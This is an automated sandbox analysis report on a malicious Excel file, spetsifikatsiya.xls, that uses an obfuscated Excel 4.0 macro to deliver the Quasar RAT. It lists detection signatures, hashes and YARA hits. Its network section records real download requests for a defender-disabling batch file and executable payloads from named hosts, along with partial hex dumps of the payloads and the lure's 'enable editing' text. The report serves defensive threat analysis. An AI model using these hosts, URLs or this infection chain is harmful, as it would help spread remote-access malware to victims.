Analysis Report spetsifikatsiya.xls

Overview

General Information

Sample Name: spetsifikatsiya.xls
Analysis ID: 336545
MD5: 2e0819723d50d0b6a2e6ffdb33778e40
SHA1: 329d002fc53f93e92b99dfbc5937412b40fccf93
SHA256: 04ee61f1184be78db3fd78821306e0b81e6dfaff17f6019d76e69237d6133b6a
Tags: SilentBuilderxls

Detection

Hidden Macro 4.0 Quasar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Scheduled temp file as task from temp location
Yara detected AntiVM_3
Yara detected Quasar RAT
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Connects to many ports of the same IP (likely port scanning)
Contains functionality to hide a thread from the debugger
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found obfuscated Excel 4.0 Macro
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hides threads from debuggers
Injects a PE file into a foreign processes
Installs a global keyboard hook
Machine Learning detection for dropped file
May check the online IP address of the machine
Obfuscated command line found
Powershell drops PE file
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Sigma detected: Microsoft Office Product Spawning Windows Shell
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Obfuscated Powershell
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to detect virtual machines (SLDT)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains embedded VBA macros
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a global mouse hook
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sleep loop found (likely to delay execution)
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\5DVxvgK9jn5gaBl[1].exe ReversingLabs: Detection: 29%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\5DVxvgK9jn5gaBl[1].exe ReversingLabs: Detection: 29%
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe ReversingLabs: Detection: 29%
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe ReversingLabs: Detection: 29%
Multi AV Scanner detection for submitted file
Source: spetsifikatsiya.xls Virustotal: Detection: 13%
Yara detected Quasar RAT
Source: Yara match File source: 00000023.00000002.2389281983.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.2384182418.0000000003CC0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2282183645.0000000003C60000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\5DVxvgK9jn5gaBl[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\5DVxvgK9jn5gaBl[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\JrekdQ.exe Joe Sandbox ML: detected
Source: sp.exe Binary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 28_2_00426F7A GetFullPathNameW,FindFirstFileExW,GetLastError, 28_2_00426F7A
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 28_2_005C7F30 FindFirstFileW,GetLastError, 28_2_005C7F30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 4x nop then jmp 01F65B55h 31_2_01F65AE0
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 4x nop then jmp 01F65B55h 31_2_01F65AD0
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 4x nop then jmp 003E5B55h 37_2_003E5C25
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 4x nop then jmp 003E5B55h 37_2_003E5AE0
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 4x nop then jmp 003E5B55h 37_2_003E5AD0
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: cutt.ly
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.67.8.238:443
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.67.8.238:443

Networking:

Connects to many ports of the same IP (likely port scanning)
Source: global traffic TCP traffic: 185.157.162.81 ports 1,3,1973,1972,7,9
May check the online IP address of the machine
Source: unknown DNS query: name: ip-api.com
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.157.162.81:1973
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 06 Jan 2021 08:57:59 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveLast-Modified: Wed, 06 Jan 2021 00:13:34 GMTETag: "53b13c0-42e600-5b83031a39cfd"Accept-Ranges: bytesContent-Length: 4384256Keep-Alive: timeout=3, max=100Content-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6f ff f4 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 da 42 00 00 0a 00 00 00 00 00 00 de f8 42 00 00 20 00 00 00 00 43 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 43 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 8c f8 42 00 4f 00 00 00 00 00 43 00 30 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 43 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e4 d8 42 00 00 20 00 00 00 da 42 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 30 06 00 00 00 00 43 00 00 08 00 00 00 dc 42 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 43 00 00 02 00 00 00 e4 42 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 f8 42 00 00 00 00 00 48 00 00 00 02 00 05 00 20 9c 00 00 54 4f 03 00 03 00 00 00 4d 01 00 06 74 eb 03 
00 18 0d 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 04 00 dd 00 00 00 01 00 00 11 00 d0 02 00 00 02 28 16 00 00 0a 28 17 00 00 0a 6f 18 00 00 0a 28 19 00 00 0a 72 01 00 00 70 28 1a 00 00 0a 0a 72 05 00 00 70 20 10 27 00 00 06 72 19 00 00 70 73 06 00 00 06 0b 07 25 fe 07 03 00 00 06 73 1b 00 00 0a 73 1c 00 00 0a 0c 08 6f 1d 00 00 0a 00 20 e8 03 00 00 28 1e 00 00 0a 00 72 39 00 00 70 20 11 27 00 00 06 72 19 00 00 70 73 06 00 00 06 0d 09 25 fe 07 03 00 00 06 73 1b 00 00 0a 73 1c 00 00 0a 13 04 11 04 6f 1d 00 00 0a 00 20 e8 03 00 00 28 1e 00 00 0a 00 72 4d 00 00 70 20 12 27 00 00 06 72 19 00 00 70 73 06 00 00 06 13 05 11 05 25 fe 07 03 00 00 06 73 1b 00 00 0a 73 1c 00 00 0a 13 06 11 06 6f 1d 00 00 0a 00 20 e8 03 00 00 28 1e 00 00 0a 00 2a 22 02 28 1f 00 00 0a 00 2a 00 00 13 30 01 00 07 00 00 00 02 00 00 11 00 14 0a 2b 00 06 2a 00 13 30 06 00 73 00 00 00 00 00 00 00 02 28 20 00 00 0a 00 00 02 73 21 00 00 0a 7d 05 00 00 04 02 03
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 06 Jan 2021 08:59:04 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveLast-Modified: Tue, 05 Jan 2021 13:10:58 GMTETag: "53b28b5-db800-5b826effab56e"Accept-Ranges: bytesContent-Length: 899072Keep-Alive: timeout=3, max=100Content-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 9c 64 f4 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 a2 0d 00 00 14 00 00 00 00 00 00 6e c1 0d 00 00 20 00 00 00 e0 0d 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 0e 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 18 c1 0d 00 53 00 00 00 00 e0 0d 00 80 11 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 a1 0d 00 00 20 00 00 00 a2 0d 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 80 11 00 00 00 e0 0d 00 00 12 00 00 00 a4 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0e 00 00 02 00 00 00 b6 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 c1 0d 00 00 00 00 00 48 00 00 00 02 00 05 00 80 e2 0c 00 98 de 00 00 03 00 00 00 3d 01 00 06 30 11 01 00 
50 d1 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 fa 57 44 5e 53 5c 60 f0 ba 5d aa 34 1f 5f fc 78 97 96 76 c7 e2 85 3f 29 30 6f 15 01 38 c6 b1 55 5f 60 b9 df cc dd 8d fd ef de c9 d4 49 af a6 50 83 13 2b 0b 7d c7 92 a5 bc 81 aa 4b b3 67 43 ed d4 0e ab 8d 4c c5 1b 17 46 62 b4 cf 94 ea bc 5f 3c 79 08 b9 a4 b6 4b 46 d4 b0 93 61 21 66 e6 e6 4f 5b 5f d9 3f 60 a7 67 76 6c 82 30 87 05 c3 86 9b 46 b3 c6 00 0c b2 9d 28 0f 9d 0b b8 33 5f d2 68 ee 34 a2 37 57 5f e5 22 c7 0d b1 cd fe f9 37 e4 64 cb 8f 6e 44 c5 42 ee 3b 0c e4 7d 91 69 fa 2f 8b 43 1f cf 1e 4f ea 3a b8 5c 9b 53 01 11 37 7d 1e 82 83 67 40 ad f3 46 4a a8 a1 60 36 21 1d 95 50 e9 7e ea a5 2c 08 29 f2 aa a4 67 46 a6 1f 4f 77 ac cb 13 ec 97 d4 9f 72 b5 08 37 79 45 ea 51 d6 e5 aa a5 f9 db d2 be 89 a5 51 ec 41 23 ea 8b c9 21 28 a4 18 4d 1e c0 c7 50 ed 80 ca 85 2e 9a 27 62 5c ea 5c 80 f1 da 53 f7 16 98 68 5c a6 b9 24 15 71 50 89 c9 80 6f 56 17 62 3a 9d 27 da 21 a0 53 6e 91 da 71 c2 3e
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 06 Jan 2021 08:59:54 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveLast-Modified: Tue, 05 Jan 2021 13:10:58 GMTETag: "53b28b5-db800-5b826effab56e"Accept-Ranges: bytesContent-Length: 899072Keep-Alive: timeout=3, max=100Content-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 9c 64 f4 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 a2 0d 00 00 14 00 00 00 00 00 00 6e c1 0d 00 00 20 00 00 00 e0 0d 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 0e 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 18 c1 0d 00 53 00 00 00 00 e0 0d 00 80 11 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 a1 0d 00 00 20 00 00 00 a2 0d 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 80 11 00 00 00 e0 0d 00 00 12 00 00 00 a4 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0e 00 00 02 00 00 00 b6 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 c1 0d 00 00 00 00 00 48 00 00 00 02 00 05 00 80 e2 0c 00 98 de 00 00 03 00 00 00 3d 01 00 06 30 11 01 00 
50 d1 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 fa 57 44 5e 53 5c 60 f0 ba 5d aa 34 1f 5f fc 78 97 96 76 c7 e2 85 3f 29 30 6f 15 01 38 c6 b1 55 5f 60 b9 df cc dd 8d fd ef de c9 d4 49 af a6 50 83 13 2b 0b 7d c7 92 a5 bc 81 aa 4b b3 67 43 ed d4 0e ab 8d 4c c5 1b 17 46 62 b4 cf 94 ea bc 5f 3c 79 08 b9 a4 b6 4b 46 d4 b0 93 61 21 66 e6 e6 4f 5b 5f d9 3f 60 a7 67 76 6c 82 30 87 05 c3 86 9b 46 b3 c6 00 0c b2 9d 28 0f 9d 0b b8 33 5f d2 68 ee 34 a2 37 57 5f e5 22 c7 0d b1 cd fe f9 37 e4 64 cb 8f 6e 44 c5 42 ee 3b 0c e4 7d 91 69 fa 2f 8b 43 1f cf 1e 4f ea 3a b8 5c 9b 53 01 11 37 7d 1e 82 83 67 40 ad f3 46 4a a8 a1 60 36 21 1d 95 50 e9 7e ea a5 2c 08 29 f2 aa a4 67 46 a6 1f 4f 77 ac cb 13 ec 97 d4 9f 72 b5 08 37 79 45 ea 51 d6 e5 aa a5 f9 db d2 be 89 a5 51 ec 41 23 ea 8b c9 21 28 a4 18 4d 1e c0 c7 50 ed 80 ca 85 2e 9a 27 62 5c ea 5c 80 f1 da 53 f7 16 98 68 5c a6 b9 24 15 71 50 89 c9 80 6f 56 17 62 3a 9d 27 da 21 a0 53 6e 91 da 71 c2 3e
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /bat/scriptxls_db309dc0-6a94-419d-8933-c37781a53f80_mic2_wddisabler.bat HTTP/1.1Host: 37.46.150.139Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /opka/iopd/ztyh/nmk/1vrkY2OMQfcfBgx.exe HTTP/1.1Host: gtp.bgConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 172.67.8.238 172.67.8.238
Source: Joe Sandbox View IP Address: 208.95.112.1 208.95.112.1
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: SUPERHOSTING_ASBG SUPERHOSTING_ASBG
Source: Joe Sandbox View ASN Name: OBE-EUROPEObenetworkEuropeSE OBE-EUROPEObenetworkEuropeSE
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /opkl/fioli/zplk/apo/5DVxvgK9jn5gaBl.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: gtp.bgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /json/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0Host: ip-api.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /opkl/fioli/zplk/apo/5DVxvgK9jn5gaBl.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: gtp.bgConnection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 37.46.150.139
Source: unknown TCP traffic detected without corresponding DNS query: 37.46.150.139
Source: unknown TCP traffic detected without corresponding DNS query: 37.46.150.139
Source: unknown TCP traffic detected without corresponding DNS query: 37.46.150.139
Source: unknown TCP traffic detected without corresponding DNS query: 37.46.150.139
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 28_2_00415B0A WSARecv, 28_2_00415B0A
Source: C:\Users\user\AppData\Roaming\sp.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ
Source: global traffic HTTP traffic detected: GET /bat/scriptxls_db309dc0-6a94-419d-8933-c37781a53f80_mic2_wddisabler.bat HTTP/1.1Host: 37.46.150.139Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /opka/iopd/ztyh/nmk/1vrkY2OMQfcfBgx.exe HTTP/1.1Host: gtp.bgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /opkl/fioli/zplk/apo/5DVxvgK9jn5gaBl.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: gtp.bgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /json/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0Host: ip-api.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /opkl/fioli/zplk/apo/5DVxvgK9jn5gaBl.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: gtp.bgConnection: Keep-Alive
Source: unknown DNS traffic detected: queries for: cutt.ly
Source: powershell.exe, 00000007.00000002.2105110121.00000000022E0000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2122564392.0000000002440000.00000002.00000001.sdmp, powershell.exe, 0000000D.00000002.2101215112.0000000002370000.00000002.00000001.sdmp, powershell.exe, 00000010.00000002.2152867669.00000000022F0000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: powershell.exe, 00000007.00000002.2105110121.00000000022E0000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2122564392.0000000002440000.00000002.00000001.sdmp, powershell.exe, 0000000D.00000002.2101215112.0000000002370000.00000002.00000001.sdmp, powershell.exe, 00000010.00000002.2152867669.00000000022F0000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: powershell.exe, 00000007.00000002.2102767553.000000000034E000.00000004.00000020.sdmp, powershell.exe, 0000000D.00000002.2100756481.000000000032E000.00000004.00000020.sdmp, powershell.exe, 00000010.00000002.2152365583.000000000038E000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000007.00000002.2102819538.0000000000379000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piri
Source: powershell.exe, 00000007.00000002.2102767553.000000000034E000.00000004.00000020.sdmp, powershell.exe, 0000000D.00000002.2100756481.000000000032E000.00000004.00000020.sdmp, powershell.exe, 00000010.00000002.2152365583.000000000038E000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: sp.exe String found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown Network traffic detected: HTTP traffic on port 49167 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Installs a global keyboard hook
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe
Installs a global mouse hook
Source: C:\Users\user\AppData\Roaming\sp.exe Windows user hook set: 0 mouse low level NULL

E-Banking Fraud:

Yara detected Quasar RAT
Source: Yara match File source: 00000023.00000002.2389281983.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.2384182418.0000000003CC0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2282183645.0000000003C60000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)
Source: dump.pcap, type: PCAP Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: 00000011.00000002.2113764449.000000000384C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: 00000023.00000002.2389281983.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000025.00000002.2384182418.0000000003CC0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 0000001F.00000002.2282183645.0000000003C60000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects Quasar RAT Author: Florian Roth
Source: C:\Users\user\Documents\pd.bat, type: DROPPED Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: 35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Detects Vermin Keylogger Author: Florian Roth
Source: 35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Document image extraction number: 0 Screenshot OCR: document is protected 1. Open the document in Ljivmjt' iS not available for protected documents.
Source: Document image extraction number: 0 Screenshot OCR: protected documents. 2. If this document was downloaded from your email, please click EnUk Editim
Source: Document image extraction number: 1 Screenshot OCR: document is protected 1. Qpen the document in Microsoft Offiu'. Prrvirwing onlinr is not availabk
Found Excel 4.0 Macro with suspicious formulas
Source: spetsifikatsiya.xls Initial sample: EXEC
Found obfuscated Excel 4.0 Macro
Source: spetsifikatsiya.xls Initial sample: High usage of CHAR() function: 21
Powershell drops PE file
